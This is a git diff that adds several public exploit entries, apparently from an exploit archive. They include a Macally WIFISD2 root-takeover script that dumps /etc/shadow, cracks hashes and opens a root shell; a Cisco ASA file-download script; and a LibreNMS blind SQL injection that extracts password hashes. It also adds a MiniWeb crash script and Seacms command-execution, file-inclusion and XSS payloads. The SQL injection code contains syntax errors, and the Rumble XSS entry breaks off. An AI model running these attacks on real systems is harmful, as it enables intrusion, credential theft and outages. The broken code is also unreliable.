diff --git a/exploits/hardware/webapps/49256.py b/exploits/hardware/webapps/49256.py
new file mode 100755
index 000000000..20f038900
--- /dev/null
+++ b/exploits/hardware/webapps/49256.py
@@ -0,0 +1,140 @@
+# Exploit Title: Macally WIFISD2-2A82 2.000.010 - Guest to Root Privilege Escalation
+# Date: 03.12.2020 
+# Exploit Author: Maximilian Barz and Daniel Schwendner
+# Vendor Homepage: https://us.macally.com/products/wifisd2
+# Version: 2.000.010
+# Tested on: Kali Linux 5.7.0-kali1-amd64
+# CVE : CVE-2020-29669
+# Reference: https://github.com/S1lkys/CVE-2020-29669/
+
+#!/usr/bin/env/python3
+import requests
+import telnetlib
+import os
+import sys
+import re
+
+banner = '''\033[94m
+  ██████ ▄▄▄█████▓ ▄▄▄       ██▀███   ▄▄▄▄    █    ██  ██▀███    ██████ ▄▄▄█████▓
+▒██    ▒ ▓  ██▒ ▓▒▒████▄    ▓██ ▒ ██▒▓█████▄  ██  ▓██▒▓██ ▒ ██▒▒██    ▒ ▓  ██▒ ▓▒
+░ ▓██▄   ▒ ▓██░ ▒░▒██  ▀█▄  ▓██ ░▄█ ▒▒██▒ ▄██▓██  ▒██░▓██ ░▄█ ▒░ ▓██▄   ▒ ▓██░ ▒░
+  ▒   ██▒░ ▓██▓ ░ ░██▄▄▄▄██ ▒██▀▀█▄  ▒██░█▀  ▓▓█  ░██░▒██▀▀█▄    ▒   ██▒░ ▓██▓ ░ 
+▒██████▒▒  ▒██▒ ░  ▓█   ▓██▒░██▓ ▒██▒░▓█  ▀█▓▒▒█████▓ ░██▓ ▒██▒▒██████▒▒  ▒██▒ ░ 
+▒ ▒▓▒ ▒ ░  ▒ ░░    ▒▒   ▓▒█░░ ▒▓ ░▒▓░░▒▓███▀▒░▒▓▒ ▒ ▒ ░ ▒▓ ░▒▓░▒ ▒▓▒ ▒ ░  ▒ ░░   
+░ ░▒  ░ ░    ░      ▒   ▒▒ ░  ░▒ ░ ▒░▒░▒   ░ ░░▒░ ░ ░   ░▒ ░ ▒░░ ░▒  ░ ░    ░    
+░  ░  ░    ░        ░   ▒     ░░   ░  ░    ░  ░░░ ░ ░   ░░   ░ ░  ░  ░    ░      
+      ░                 ░  ░   ░      ░         ░        ░           ░           
+                                           ░                                     
+\x1b[0m
+Macally WIFISD2 Guest to Root Privilege Escalation for CVE-2020-29669 by Maximilian Barz and Daniel Schwendner 
+'''
+def main():
+    if(len(sys.argv) < 2):
+        print(banner)
+        print("Usage: %s <host> " % sys.argv[0])
+        print("Eg:    %s 1.2.3.4 " % sys.argv[0])
+        return
+    rhost = sys.argv[1]
+    session = requests.Session()
+    guest_creds = "guest_pass"
+    admin_pass_to_set = "Silky123"
+
+    def send_requests():
+        url = "http://"+rhost+"/protocol.csp?function=set"
+        payload = {'fname':'security','opt':'pwdchk','name':'guest','pwd1':guest_creds,'function':'set'}
+        headers = {
+            'Host': rhost,
+            'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0',
+            'Accept': '*/*',
+            'Accept-Language': 'en-US,en;q=0.5',
+            'Accept-Encoding': 'gzip, deflate',
+            'Referer': 'http://'+rhost+'/index.html',
+            'Content-Type': 'application/x-www-form-urlencoded',
+            'Content-Length': '65',
+            'Connection': 'close',
+            'Cache-Control': 'no-cache',
+        }
+        
+        r= session.post(url, payload, headers)
+        if (b"<errno>0</errno>" in r.content):
+            print("\033[92m[+] Authentication successful\x1b[0m")
+            print("\t"+str(session.cookies.get_dict()))
+        else:
+            print("\033[91m[+] Authentication failed.\x1b[0m")
+            sys.exit()
+
+        url = "http://"+rhost+"/protocol.csp?fname=security&function=set"    
+        payload = {'name':'admin','opt':'pwdmod','pwd1':admin_pass_to_set,'pwd2':admin_pass_to_set}
+        headers = {
+            'Host': rhost,
+            'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0',
+            'Accept': '*/*',
+            'Accept-Language': 'en-US,en;q=0.5',
+            'Accept-Encoding': 'gzip, deflate',
+            'Referer': 'http://'+rhost+'/app/user/guest.html',
+            'Content-Type': 'application/x-www-form-urlencoded',
+            'Content-Length': '49',
+            'Connection': 'close',
+            'Cache-Control': 'no-cache',
+        }
+        d = session.post(url, payload, headers)
+        if (b"<errno>0</errno>" in d.content):
+            print("\033[92m[+] Admin Password changed to: "+admin_pass_to_set+"\x1b[0m")
+            telnet_grep_root_hash()
+            #print("[+] Spawning Admin Shell")
+            #telnet_login()
+        else:
+            print("\033[91m[+] Admin Password change failed\x1b[0m")
+            sys.exit()
+
+
+    def telnet_grep_root_hash():
+        user = "admin"
+        tn = telnetlib.Telnet(rhost)
+        tn.read_until(b"login: ")
+        tn.write(user.encode('ascii') + b"\n")
+        tn.read_until(b"Password: ")
+        tn.write(admin_pass_to_set.encode('ascii') + b"\n")
+        print("\033[92m[+] Dumping Hashes:\x1b[0m")
+        tn.write(b"cat /etc/shadow\n\r")
+        tn.write(b"exit\n")
+        output = tn.read_all().decode('ascii')
+        L = output.split('\n')
+        for hash in L:
+            if ":" in hash:
+                print("\t"+hash)
+        print("\n\r")
+        for hash in L:
+            if "root" in hash:
+                print("\033[92m[+] Root Hash found, trying to crack it..\x1b[0m")
+                print("\t"+hash)  #root:$1$D0o034Sm$LY0jyeFPifEXVmdgUfSEj/:15386:0:99999:7:::
+                f = open("root_hash","w+")
+                f.write(hash)
+                f.close()
+                crack_root_hash();
+
+
+    def crack_root_hash():
+        f = open("root_hash", "r")
+        hash = f.read()
+        if ("root:$1$D0o034Sm$LY0jyeFPifEXVmdgUfSEj/:15386:0:99999:7:::" in hash):
+            print("\033[92mRoot Password: 20080826\x1b[0m\n")
+            telnet_login()
+        else:
+            os.system("hashcat -a 0 -m 500 root_hash /root/tools/routersploit/routersploit/resources/wordlists/passwords.txt") #https://github.com/threat9/routersploit/blob/master/routersploit/resources/wordlists/passwords.txt
+
+    def telnet_login():
+        print("\033[92m[+] Spawning Rootshell\x1b[0m")
+        user = "root"
+        root_password="20080826"
+        tn = telnetlib.Telnet(rhost)
+        tn.read_until(b"login: ")
+        tn.write(user.encode('ascii') + b"\n")
+        tn.read_until(b"Password: ")
+        tn.write(root_password.encode('ascii') + b"\n")
+        tn.interact()
+    print(banner)
+    send_requests()
+
+if(__name__ == '__main__'):
+    main()
\ No newline at end of file
diff --git a/exploits/hardware/webapps/49262.py b/exploits/hardware/webapps/49262.py
new file mode 100755
index 000000000..3ae7ad1f6
--- /dev/null
+++ b/exploits/hardware/webapps/49262.py
@@ -0,0 +1,113 @@
+# Exploit Title: Cisco ASA 9.14.1.10 and FTD 6.6.0.1 - Path Traversal (2)
+# Date: 12 Dec 2020
+# Exploit Author: Freakyclown@cygenta.co.uk
+# Vendor Homepage: cisco.com
+# Software Link: It’s against Hardware, specifically ASA’s and FTD’s
+# Version: ASAs (from version 9.6 to 9.14.1.10) and FTD’s (versions 6.2.3 to 6.6.0.1)
+# Tested on: exploit runs on Python3 on OSX and on Kali Linux against cisco ASA 9.14
+# CVE : CVE-2020-3452
+# Github : https://github.com/cygenta/CVE-2020-3452
+
+import requests
+
+# Written by freakyclown for @CygentaHQ
+# Cisco ASA Path Traversal
+# CVE-2020-3452
+# Usage: CVE-2020-3452.py {target}"
+# Example: CVE-2020-3452.py 192.168.0.12"
+# Requires - Requests - pip3 install requests
+#
+# This tool takes advantage of the above cve and attempts to
+# download files as listed below, it is suggested that you make
+# a working folder for the outputfiles to avoid confusion if
+# attacking mutliple ASA's
+
+# set your target
+target = input("Enter target IP/Url: ")
+
+
+def grabstuff():
+    for file in files:
+        print("trying: ", file)
+
+        #set request parameters
+        params = (
+            ('type', 'mst'),
+            ('textdomain', '+CSCOE+/'+file),
+            ('default-language', ''),
+            ('lang', '../'),
+        )
+
+        # set the response to the result of the request, inputting in target and params and ignoring ssl cert problems
+        response = requests.get('https://'+target+'/+CSCOT+/translation-table', params=params, verify=False)
+        # write the file to the disk
+        f = open(file,"w")
+        f.write(response.text) 
+        f.close()
+
+
+
+# this is a list of files available to download, more will be added in time
+# if anyone has a list of ASA files, I'd be happy to add here
+files = {
+"sess_update.html",
+"blank.html",
+"noportal.html",
+"portal_ce.html",
+"portal.html",
+"logon_custom.css",
+"svc.html",
+"logo.gif",
+"portal_inc.lua",
+"nostcaccess.html",
+"session.js",
+"portal.js",
+"portal_custom.css",
+"running.conf",
+"tlbrportal_forms.js",
+"logon_forms.js",
+"win.js",
+"portal.css",
+"lced.html",
+"pluginlib.js",
+"useralert.html",
+"ping.html",
+"app_index.html",
+"shshimdo_url",
+"session_password.html",
+"relayjar.html",
+"relayocx.html",
+"color_picker.js",
+"color_picker.html",
+"cedhelp.html",
+"cedmain.html",
+"cedlogon.html",
+"cedportal.html",
+"portal_elements.html",
+"commonspawn.js",
+"common.js",
+"appstart.js",
+"relaymonjar.html",
+"relaymonocx.html",
+"cedsave.html",
+"tunnel_linux.jnlp",
+"ask.html",
+"no_svc.html",
+"preview.html",
+"cedf.html",
+"ced.html",
+"logon_redirect.html",
+"logout.html",
+"tunnel_mac.jnlp",
+"gp-gip.html",
+"auth.html",
+"wrong_url.html",
+"logon.html"}
+
+
+# obvious thing is obvious, try the things and barf if fail
+try:
+    grabstuff()
+except Exception as err:
+    print("Something went wrong sorry")
+    print(err)
\ No newline at end of file
diff --git a/exploits/linux/local/49259.c b/exploits/linux/local/49259.c
new file mode 100644
index 000000000..524a43d2c
--- /dev/null
+++ b/exploits/linux/local/49259.c
@@ -0,0 +1,57 @@
+# Exploit Title: libbabl 0.1.62 - Broken Double Free Detection (PoC)
+# Date: December 14, 2020
+# Exploit Author: Carter Yagemann
+# Vendor Homepage: https://www.gegl.org
+# Software Link: https://www.gegl.org/babl/
+# Version: libbabl 0.1.62 and newer
+# Tested on: Debian Buster (Linux 4.19.0-9-amd64)
+# Compile: gcc -Ibabl-0.1 -lbabl-0.1 babl-0.1.62_babl_free.c
+
+/*
+ * Babl has an interesting way of managing buffers allocated and freed using babl_malloc()
+ * and babl_free(). This is the structure of its allocations (taken from babl-memory.c):
+ *
+ * typedef struct
+ * {
+ *   char  *signature;
+ *   size_t size;
+ *   int  (*destructor)(void *ptr);
+ * } BablAllocInfo;
+ *
+ *
+ * signature is used to track whether a chunk was allocated by babl, and if so, whether
+ * it is currently allocated or freed. This is done by either pointing it to the global
+ * string "babl-memory" or "So long and thanks for all the fish." (babl-memory.c:44).
+ *
+ * Using this signature, babl can detect bad behavior's like double free (babl-memory.c:173):
+ *
+ * void
+ * babl_free (void *ptr,
+ *            ...)
+ * {
+ *   ...
+ *       if (freed == BAI (ptr)->signature)
+ *         fprintf (stderr, "\nbabl:double free detected\n");
+ *
+ *
+ * Or so the developers think. As it turns out, because babl internally uses libc's malloc()
+ * and free(), which has its own data that it stores within freed chunks, most systems will
+ * overwrite babl's signature variable upon freeing, breaking the double free detection.
+ * The simple PoC below demonstrates this:
+ */
+
+#include <stdlib.h>
+#include <stdio.h>
+#include <string.h>
+
+#include <babl/babl-memory.h>
+
+int main(int argc, char **argv) {
+    void *buf = babl_malloc(42);
+    babl_free(buf);
+    // BUG: reports an "unknown" pointer warning when the following is clea=
+rly a double free
+    babl_free(buf);
+
+    return 0;
+}
\ No newline at end of file
diff --git a/exploits/multiple/webapps/49246.py b/exploits/multiple/webapps/49246.py
new file mode 100755
index 000000000..82060e3e5
--- /dev/null
+++ b/exploits/multiple/webapps/49246.py
@@ -0,0 +1,263 @@
+# Exploit Title: LibreNMS 1.46 - MAC Accounting Graph Authenticated SQL Injection
+# Google Dork: Unknown
+# Date: 13-12-2020
+# Exploit Author: Hodorsec
+# Vendor Homepage: https://www.librenms.org
+# Software Link: https://github.com/librenms/librenms
+# Update notice: https://community.librenms.org/t/v1-69-october-2020-info/13838
+# Version: 1.46
+# Tested on: Debian 10, PHP 7, LibreNMS 1.46; although newer version might be affected until 1.69 patch
+# CVE : N/A
+
+#!/usr/bin/python3
+
+# EXAMPLE:
+# $ python3 poc_librenms-1.46_auth_sqli_timed.py librenms D32fwefwef http://192.168.252.14 2
+# [*] Checking if authentication for page is required...
+# [*] Visiting page to retrieve initial token and cookies...
+# [*] Retrieving authenticated cookie...
+# [*] Printing number of rows in table...
+# 1
+# [*] Found 1 rows of data in table 'users'
+#
+# [*] Retrieving 1 rows of data using 'username' as column and 'users' as table...
+# [*] Extracting strings from row 1...
+# librenms
+# [*] Retrieved value 'librenKs' for column 'username' in row 1
+# [*] Retrieving 1 rows of data using 'password' as column and 'users' as table...
+# [*] Extracting strings from row 1...
+# $2y$10$pAB/lLNoT8wx6IedB3Hnpu./QMBqN9MsqJUcBy7bsr
+# [*] Retrieved value '$2y$10$pAB/lLNoT8wx6IedB3Hnpu./QMBqN9MsqJUcBy7bsr' for column 'password' in row 1
+#
+# [+] Done!
+
+import requests
+import urllib3
+import os
+import sys
+import re
+from bs4 import BeautifulSoup
+
+# Optionally, use a proxy
+# proxy = "http://<user>:<pass>@<proxy>:<port>"
+proxy = ""
+os.environ['http_proxy'] = proxy
+os.environ['HTTP_PROXY'] = proxy
+os.environ['https_proxy'] = proxy
+os.environ['HTTPS_PROXY'] = proxy
+
+# Disable cert warnings
+urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
+
+# Set timeout
+timeout = 10
+
+# Injection prefix and suffix
+inj_prefix = "(select(sleep("
+inj_suffix = ")))))"
+
+# Decimal begin and end
+dec_begin = 48
+dec_end = 57
+
+# ASCII char begin and end
+ascii_begin = 32
+ascii_end = 126
+
+# Handle CTRL-C
+def keyboard_interrupt():
+    """Handles keyboardinterrupt exceptions"""
+    print("\n\n[*] User requested an interrupt, exiting...")
+    exit(0)
+
+# Custom headers
+def http_headers():
+    headers = {
+        'User-Agent': 'Mozilla',
+    }
+    return headers
+
+def check_auth(url,headers):
+    print("[*] Checking if authentication for page is required...")
+    target = url + "/graph.php"
+    r = requests.get(target,headers=headers,timeout=timeout,verify=False)
+    if "Unauthorized" in r.text:
+        return True
+    else:
+        return False
+
+def get_initial_token_and_cookies(url,headers):
+    print("[*] Visiting page to retrieve initial token and cookies...")
+    target = url + "/login"
+    r = requests.get(target,headers=headers,timeout=timeout,verify=False)
+    soup = BeautifulSoup(r.text,'html.parser')
+    for n in soup('input'):
+        if n['name'] == "_token":
+            token = n['value']
+            return token,r.cookies
+        else:
+            return None,r.cookies
+
+def get_valid_cookie(url,headers,token,cookies,usern,passw):
+    print("[*] Retrieving authenticated cookie...")
+    appl_cookie = "laravel_session"
+    post_data = {'_token':token,
+                'username':usern,
+                'password':passw,
+                'submit':''}
+    target = url + "/login"
+    r = requests.post(target,data=post_data,headers=headers,cookies=cookies,timeout=timeout,verify=False)
+    res = r.text
+    if "Overview | LibreNMS" in res:
+        return r.cookies
+    else:
+        print("[!] No valid response from used session, exiting!\n")
+        exit(-1)
+
+# Perform the SQLi call for injection
+def sqli(url,headers,cookies,inj_str,sleep):
+    comment_inj_str = re.sub(" ","/**/",inj_str)
+    inj_params = {'id':'1',
+                'stat':'none',
+                'type':'port_mac_acc_total',
+                'sort':comment_inj_str,
+                'debug':'1'}
+    inj_params_unencoded = "&".join("%s=%s" % (k,v) for k,v in inj_params.items())
+    # Do GET request
+    r = requests.get(url,params=inj_params_unencoded,headers=headers,cookies=cookies,timeout=timeout,verify=False)
+    res = r.elapsed.total_seconds()
+    if res >= sleep:
+        return True
+    elif res < sleep:
+        return False
+    else:
+        print("[!] Something went wrong checking responses. Check responses manually. Exiting.")
+        exit(-1)
+
+# Extract rows
+def get_rows(url,headers,cookies,table,sleep):
+    rows = ""
+    max_pos_rows = 4
+    # Get number maximum positional characters of rows: e.g. 1096,2122,1234,etc.
+    for pos in range(1,max_pos_rows+1):
+        # Test if current pos does have any valid value. If not, break
+        direction = ">"
+        inj_str = inj_prefix + str(sleep) + "-(if(ORD(MID((select IFNULL(CAST(COUNT(*) AS NCHAR),0x20) FROM " + table + ")," + str(pos) + ",1))" + direction + "1,0," + str(sleep) + inj_suffix
+        if not sqli(url,headers,cookies,inj_str,sleep):
+            break
+        # Loop decimals
+        direction = "="
+        for num_rows in range(dec_begin,dec_end+1):
+            row_char = chr(num_rows)
+            inj_str = inj_prefix + str(sleep) + "-(if(ORD(MID((select IFNULL(CAST(COUNT(*) AS NCHAR),0x20) FROM " + table + ")," + str(pos) + ",1))"=+ direction + str(num_rows) + ",0," + str(sleep) + inj_suffix
+            if sqli(url,headers,cookies,inj_str,sleep):
+                rows += row_char
+                print(row_char,end='',flush=True)
+                break
+    if rows != "":
+        print("\n[*] Found " + rows + " rows of data in table '" + table + "'\n")
+        return int(rows)
+    else:
+        return False
+
+# Loop through positions and characters
+def get_data(url,headers,cookies,row,column,table,sleep):
+    extracted = ""
+    max_pos_len = 50
+    # Loop through length of string
+    # Not very efficient, should use a guessing algorithm
+    print("[*] Extracting strings from row " + str(row+1) + "...")
+    for pos in range(1,max_pos_len):
+        # Test if current pos does have any valid value. If not, break
+        direction = ">"
+        inj_str = inj_prefix + str(sleep) + "-(if(ord(mid((select ifnull(cast(" + column + " as NCHAR),0x20) from " + table + " LIMIT " + str(row) += ",1)," + str(pos) + ",1))" + direction + str(ascii_begin) + ",0," + str(sleep) + inj_suffix
+        if not sqli(url,headers,cookies,inj_str,sleep):
+            break
+        # Loop through ASCII printable characters
+        direction = "="
+        for guess in range(ascii_begin,ascii_end+1):
+            extracted_char = chr(guess)
+            inj_str = inj_prefix + str(sleep) + "-(if(ord(mid((select ifnull(cast(" + column + " as NCHAR),0x20) from " + table + " LIMIT " + str(row) + ",1)," + str(pos) + ",1))" + direction + str(guess) + ",0," + str(sleep) + inj_suffix
+            if sqli(url,headers,cookies,inj_str,sleep):
+                extracted += chr(guess)
+                print(extracted_char,end='',flush=True)
+                break
+    return extracted
+
+# Main
+def main(argv):
+    if len(sys.argv) == 5:
+        usern = sys.argv[1]
+        passw = sys.argv[2]
+        url = sys.argv[3]
+        sleep = int(sys.argv[4])
+    else:
+        print("[*] Usage: " + sys.argv[0] + " <username> <password> <url> <sleep_in_seconds>\n")
+        exit(0)
+
+    # Random headers
+    headers = http_headers()
+
+    # Do stuff
+    try:
+        # Get a valid initial token and cookies
+        token,cookies = get_initial_token_and_cookies(url,headers)
+        
+        # Check if authentication is required
+        auth_required = check_auth(url,headers)
+
+        if auth_required:
+            # Get an authenticated session cookie using credentials
+            valid_cookies = get_valid_cookie(url,headers,token,cookies,usern,passw)
+        else:
+            valid_cookies = cookies
+            print("[+] Authentication not required, continue without authentication...")
+
+        # Setting the correct vulnerable page
+        url = url + "/graph.php"
+
+        # The columns to retrieve
+        columns = ['username','password']
+
+        # The table to retrieve data from
+        table = "users"
+
+        # Getting rows
+        print("[*] Printing number of rows in table...")
+        rows = get_rows(url,headers,valid_cookies,table,sleep)
+        if not rows:
+            print("[!] Unable to retrieve rows, checks requests.\n")
+            exit(-1)
+
+        # Getting values for found rows in specified columns
+        for column in columns:
+            print("[*] Retrieving " + str(rows) + " rows of data using '" + column + "' as column and '" + table + "' as table...")
+            for row in range(0,rows):
+                # rowval_len = get_length(url,headers,row,column,table)
+                retrieved = get_data(url,headers,valid_cookies,row,column,table,sleep)
+                print("\n[*] Retrieved value '" + retrieved + "' for column'" + column + "' in row " + str(row+1))
+        # Done
+        print("\n[+] Done!\n")
+
+    except requests.exceptions.Timeout:
+        print("[!] Timeout error\n")
+        exit(-1)
+    except requests.exceptions.TooManyRedirects:
+        print("[!] Too many redirects\n")
+        exit(-1)
+    except requests.exceptions.ConnectionError:
+        print("[!] Not able to connect to URL\n")
+        exit(-1)
+    except requests.exceptions.RequestException as e:
+        print("[!] " + str(e))
+        exit(-1)
+    except requests.exceptions.HTTPError as e:
+        print("[!] Failed with error code - " + str(e.code) + "\n")
+        exit(-1)
+    except KeyboardInterrupt:
+        keyboard_interrupt()
+        exit(-1)
+
+# If we were called as a program, go execute the main function.
+if __name__ == "__main__":
+    main(sys.argv[1:])
\ No newline at end of file
diff --git a/exploits/multiple/webapps/49247.py b/exploits/multiple/webapps/49247.py
new file mode 100755
index 000000000..8819ba6af
--- /dev/null
+++ b/exploits/multiple/webapps/49247.py
@@ -0,0 +1,55 @@
+# Exploit Title: MiniWeb HTTP Server 0.8.19 - Buffer Overflow (PoC)
+# Date: 13.12.2020
+# Exploit Author: securityforeveryone.com
+# Author Mail: hello[AT]securityforeveryone.com
+# Vendor Homepage: https://sourceforge.net/projects/miniweb/
+# Software Link: https://sourceforge.net/projects/miniweb/files/miniweb/0.8/miniweb-win32-20130309.zip/download
+# Version: 0.8.19
+# Tested on: Win7 x86
+# Researchers: Security For Everyone Team - https://securityforeveryone.com
+
+'''
+Description
+
+ MiniWeb HTTP server 0.8.19 allows remote attackers to cause a denial of service (daemon crash) via a long name for the
+ first parameter in a POST request.
+
+Exploitation
+
+ The vulnerability is the first parameter's name of the POST request. Example: PARAM_NAME1=param_data1&param_name2=param_data2
+ if we send a lot of "A" characters to "PARAM_NAME1", the miniweb server will crash.
+
+About Security For Everyone Team
+
+We are a team that has been working on cyber security in the industry for a long time. 
+In 2020, we created securityforeveyone.com where everyone can test their website security and get help to fix their vulnerabilities.
+We have many free tools that you can use here: https://securityforeveryone.com/free-tool-list
+
+'''
+
+#!/usr/bin/python
+
+import socket
+import sys
+import struct
+
+if len(sys.argv) != 2 :
+	print "[+] Usage : python exploit.py [VICTIM_IP]"
+	exit(0)
+
+TCP_IP = sys.argv[1]
+TCP_PORT = 8000
+
+xx = "A"*2038 #4085
+
+http_req = "POST /index.html HTTP/1.1\r\n"
+http_req += "Host: 192.168.231.140\r\n"
+http_req += "From: header-data\r\n"
+http_req += "Content-Type: application/x-www-form-urlencoded\r\n\r\n"
+http_req += xx + "=param_data1&param_name2=param_data2"
+
+s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+s.connect((TCP_IP, TCP_PORT))
+print "[+] Sending exploit payload..."
+s.send(http_req)
+s.close()
\ No newline at end of file
diff --git a/exploits/multiple/webapps/49249.txt b/exploits/multiple/webapps/49249.txt
new file mode 100644
index 000000000..f7202209a
--- /dev/null
+++ b/exploits/multiple/webapps/49249.txt
@@ -0,0 +1,29 @@
+# Exploit Title: Seacms 11.1 - 'ip and weburl' Remote Command Execution
+# Date: 20201212
+# Exploit Author: j5s
+# Vendor Homepage: https://www.seacms.net/
+# Software Link: https://www.seacms.net/
+# Version: 11.1
+
+POST /SeaCMS111/5f9js3/admin_ip.php?action=set HTTP/1.1
+Host: 192.168.137.139
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0) Gecko/20100101 Firefox/83.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 36
+Origin: http://192.168.137.139
+Connection: close
+Referer: http://192.168.137.139/SeaCMS111/5f9js3/admin_ip.php
+Cookie: more=1; Hm_lvt_22c4c422b3e7b17729ce8b5817d54592=1607175396;
+PHPSESSID=t1gc019b35rrgmr1dg53gfje96;
+t00ls=e54285de394c4207cd521213cebab040;
+t00ls_s=YTozOntzOjQ6InVzZXIiO3M6MzoicGhwIjtzOjM6ImFsbCI7aTowO3M6MzoiaHRhIjtpOjE7fQ%3D%3D
+Upgrade-Insecure-Requests: 1
+
+v=0&ip=+%22%3Bphpinfo%28%29%3B%2F%2F
+
+Vulnerable parameters:ip
+
+payload:";phpinfo();//
\ No newline at end of file
diff --git a/exploits/multiple/webapps/49250.txt b/exploits/multiple/webapps/49250.txt
new file mode 100644
index 000000000..acedb7419
--- /dev/null
+++ b/exploits/multiple/webapps/49250.txt
@@ -0,0 +1,24 @@
+# Exploit Title: Seacms 11.1 - 'file' Local File Inclusion
+# Date: 20201212
+# Exploit Author: j5s
+# Vendor Homepage: https://www.seacms.net/
+# Software Link: https://www.seacms.net/
+# Version: 11.1
+
+GET /SEACMS111/5f9js3/admin_safe.php?action=download&file=C:/windows/system.ini HTTP/1.1
+Host: 192.168.137.139
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0) Gecko/20100101 Firefox/83.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Accept-Encoding: gzip, deflate
+Connection: close
+Referer: http://192.168.137.139/SEACMS111/5f9js3/admin_safe.php?action=scan
+Cookie: more=1; Hm_lvt_22c4c422b3e7b17729ce8b5817d54592=1607175396;
+PHPSESSID=t1gc019b35rrgmr1dg53gfje96;
+t00ls=e54285de394c4207cd521213cebab040;
+t00ls_s=YTozOntzOjQ6InVzZXIiO3M6MzoicGhwIjtzOjM6ImFsbCI7aTowO3M6MzoiaHRhIjtpOjE7fQ%3D%3D
+Upgrade-Insecure-Requests: 1
+
+Vulnerable parameters: file
+
+payload:C:/windows/system.ini
\ No newline at end of file
diff --git a/exploits/multiple/webapps/49251.txt b/exploits/multiple/webapps/49251.txt
new file mode 100644
index 000000000..fec335073
--- /dev/null
+++ b/exploits/multiple/webapps/49251.txt
@@ -0,0 +1,30 @@
+# Exploit Title: Seacms 11.1 - 'checkuser' Stored XSS
+# Date: 20201212
+# Exploit Author: j5s
+# Vendor Homepage: https://www.seacms.net/
+# Software Link: https://www.seacms.net/
+# Version: 11.1
+
+POST /SEACMS111/5f9js3/admin_safe.php?action=setting HTTP/1.1
+Host: 192.168.137.139
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0)
+Gecko/20100101 Firefox/83.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 97
+Origin: http://192.168.137.139
+Connection: close
+Referer: http://192.168.137.139/SEACMS111/5f9js3/admin_safe.php?action=setting
+Cookie: more=1; Hm_lvt_22c4c422b3e7b17729ce8b5817d54592=1607175396;
+PHPSESSID=t1gc019b35rrgmr1dg53gfje96;
+t00ls=e54285de394c4207cd521213cebab040;
+t00ls_s=YTozOntzOjQ6InVzZXIiO3M6MDoiIjtzOjM6ImFsbCI7aTowO3M6MzoiaHRhIjtpOjE7fQ%3D%3D
+Upgrade-Insecure-Requests: 1
+
+checkuser=%22%3E%3CsCrIpT%3Ealert%281%29%3C%2FsCrIpT%3E&checkhta=on&btnsetting=%E6%8F%90%E4%BA%A4
+
+Vulnerable parameters: checkuser
+
+payload:"><ScRiPt>alert(document.cookie)</ScRiPt>
\ No newline at end of file
diff --git a/exploits/multiple/webapps/49252.txt b/exploits/multiple/webapps/49252.txt
new file mode 100644
index 000000000..2bdfffc61
--- /dev/null
+++ b/exploits/multiple/webapps/49252.txt
@@ -0,0 +1,36 @@
+# Exploit Title: WordPress Plugin Total Upkeep 1.14.9 - Database and Files Backup Download
+# Google Dork: intitle:("Index of" AND "wp-content/plugins/boldgrid-backup/=")
+# Date: 2020-12-12
+# Exploit Author: Wadeek
+# Vendor Homepage: https://www.boldgrid.com/
+# Software Link: https://downloads.wordpress.org/plugin/boldgrid-backup.1.14.9.zip
+# Version: 1.14.9
+# Tested on: BackBox Linux
+
+1) 'readme.txt' file reveal the plugin version :
+-> GET /wp-content/plugins/boldgrid-backup/readme.txt
+Stable tag: 1.14.9
+
+2) 'env-info.php' file reveals the following informations without authentication :
+-> GET /wp-content/plugins/boldgrid-backup/cli/env-info.php
+{
+    [...],
+    "php_uname":"Linux wordpress-server X.X.X-XX-generic #XX-Ubuntu [...] x=
+86_64",
+    "php_version":"7.X.X",
+    "server_addr":"127.0.0.1",
+    "server_name":"www.example.com",
+    "server_protocol":"HTTP/1.1",
+    "server_software":"Apache/2.X.XX (Ubuntu)",
+    "uid":XX,
+    "username":"www-data"
+}
+
+3) 'restore-info.json' file reveals the name and location of the archive containing the backups without authentication :
+-> GET /wp-content/plugins/boldgrid-backup/cron/restore-info.json
+{
+    [...]
+    "filepath":"/wp-content/boldgrid_backup_[RANDOM]/boldgrid-backup-www.example.com_wordpress-[RANDOM]-[DATE]-XXXXXX.zip"
+    [...]
+}
+--trekuen-71b82944-04b2-40f7-b2e2-d8de1b7f2bb8--
\ No newline at end of file
diff --git a/exploits/multiple/webapps/49253.txt b/exploits/multiple/webapps/49253.txt
new file mode 100644
index 000000000..a2bbed8f8
--- /dev/null
+++ b/exploits/multiple/webapps/49253.txt
@@ -0,0 +1,75 @@
+# Exploit Title: Rumble Mail Server 0.51.3135 - 'servername' Stored XSS
+# Date: 2020-9-3
+# Exploit Author: Mohammed Alshehri
+# Vendor Homepage: http://rumble.sf.net/
+# Software Link:  https://sourceforge.net/projects/rumble/files/Windows%20binaries/rumble_0.51.3135-setup.exe
+# Version: Version 0.51.3135
+# Tested on: Microsoft Windows 10 Education - 10.0.17763 N/A Build 17763
+
+# Exploit:
+POST /settings:save HTTP/1.1
+Host: 127.0.0.1:2580
+Connection: keep-alive
+Content-Length: 343
+Cache-Control: max-age=0
+Authorization: Basic YWRtaW46YWRtaW4=
+Upgrade-Insecure-Requests: 1
+Origin: http://127.0.0.1:2580
+Content-Type: application/x-www-form-urlencoded
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.57
